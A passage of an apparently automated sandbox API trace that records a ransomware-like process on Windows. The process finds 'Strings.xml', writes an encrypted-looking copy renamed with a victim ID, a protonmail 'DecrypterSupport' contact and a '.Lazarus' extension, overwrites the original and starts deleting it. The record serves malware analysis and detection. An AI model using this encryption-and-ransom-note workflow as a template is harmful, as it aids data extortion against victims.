dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0081.700] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.700] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.700] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x1, dwReserved1=0x0, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0081.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0081.700] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.700] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.700] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0081.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.701] AreFileApisANSI () returned 1 [0081.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Strings.xml", lpUsedDefaultChar=0x0) returned 34 [0081.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0081.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0081.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0081.701] AreFileApisANSI () returned 1 [0081.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0081.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69210 [0081.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml") returned 34 [0081.701] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0081.701] GetFileType (hFile=0x428) returned 0x1 [0081.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0081.702] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0081.702] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0081.702] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0081.702] CloseHandle (hObject=0x428) returned 1 [0081.702] AreFileApisANSI () returned 1 [0081.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0081.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68d60 [0081.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml") returned 34 [0081.702] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0081.703] GetFileType (hFile=0x428) returned 0x1 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0081.703] CloseHandle (hObject=0x428) returned 1 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0081.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0081.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.704] AreFileApisANSI () returned 1 [0081.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68f40 [0081.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml") returned 34 [0081.704] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704)) returned 1 [0081.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0081.704] AreFileApisANSI () returned 1 [0081.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0081.704] GetLastError () returned 0x0 [0081.704] SetLastError (dwErrCode=0x0) [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0081.704] GetLastError () returned 0x0 [0081.704] SetLastError (dwErrCode=0x0) [0081.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0081.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x690d0 [0081.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0081.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76020 [0081.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0081.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0081.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0081.705] AreFileApisANSI () returned 1 [0081.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0081.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0081.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=96 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 96 [0081.705] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\strings.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0081.705] GetFileType (hFile=0x428) returned 0x1 [0081.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0081.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0081.706] AreFileApisANSI () returned 1 [0081.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0081.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69170 [0081.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml") returned 34 [0081.706] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.706] GetFileType (hFile=0x42c) returned 0x1 [0081.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0081.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0081.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0081.706] GetLastError () returned 0x0 [0081.706] SetLastError (dwErrCode=0x0) [0081.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0081.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.706] GetLastError () returned 0x0 [0081.706] SetLastError (dwErrCode=0x0) [0081.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0081.707] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0081.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0081.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0081.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0081.708] GetLastError () returned 0x0 [0081.709] SetLastError (dwErrCode=0x0) [0081.709] GetLastError () returned 0x0 [0081.709] SetLastError (dwErrCode=0x0) [0081.709] GetLastError () returned 0x0 [0081.709] SetLastError (dwErrCode=0x0) [0081.709] GetLastError () returned 0x0 [0081.709] SetLastError (dwErrCode=0x0) [0081.709] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.709] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.710] GetLastError () returned 0x0 [0081.710] SetLastError (dwErrCode=0x0) [0081.710] GetLastError () returned 0x0 [0081.710] SetLastError (dwErrCode=0x0) [0081.711] GetLastError () returned 0x0 [0081.711] SetLastError (dwErrCode=0x0) [0081.711] GetLastError () returned 0x0 [0081.711] SetLastError (dwErrCode=0x0) [0081.711] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.711] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.711] GetLastError () returned 0x0 [0081.711] SetLastError (dwErrCode=0x0) [0081.711] GetLastError () returned 0x0 [0081.711] SetLastError (dwErrCode=0x0) [0081.711] GetLastError () returned 0x0 [0081.712] SetLastError (dwErrCode=0x0) [0081.712] GetLastError () returned 0x0 [0081.712] SetLastError (dwErrCode=0x0) [0081.712] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x704, lpOverlapped=0x0) returned 1 [0081.712] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.712] GetLastError () returned 0x0 [0081.712] SetLastError (dwErrCode=0x0) [0081.712] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0081.712] GetLastError () returned 0x0 [0081.712] SetLastError (dwErrCode=0x0) [0081.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0081.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0081.713] GetLastError () returned 0x0 [0081.713] SetLastError (dwErrCode=0x0) [0081.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0081.713] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0x710, lpOverlapped=0x0) returned 1 [0081.713] GetLastError () returned 0x0 [0081.713] SetLastError (dwErrCode=0x0) [0081.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0081.713] GetLastError () returned 0x0 [0081.713] SetLastError (dwErrCode=0x0) [0081.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0081.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0081.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0081.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0081.713] CloseHandle (hObject=0x428) returned 1 [0081.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0081.714] CloseHandle (hObject=0x42c) returned 1 [0081.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0081.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0081.715] AreFileApisANSI () returned 1 [0081.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0081.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68b80 [0081.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml") returned 34 [0081.715] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.716] GetFileType (hFile=0x42c) returned 0x1 [0081.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0081.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0081.716] GetLastError () returned 0xb7 [0081.716] SetLastError (dwErrCode=0xb7) [0081.716] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0081.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0081.717] CloseHandle (hObject=0x42c) returned 1 [0081.888] AreFileApisANSI () returned 1 [0081.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0081.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68d60 [0081.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml") returned 34 [0081.888] DeleteFileW 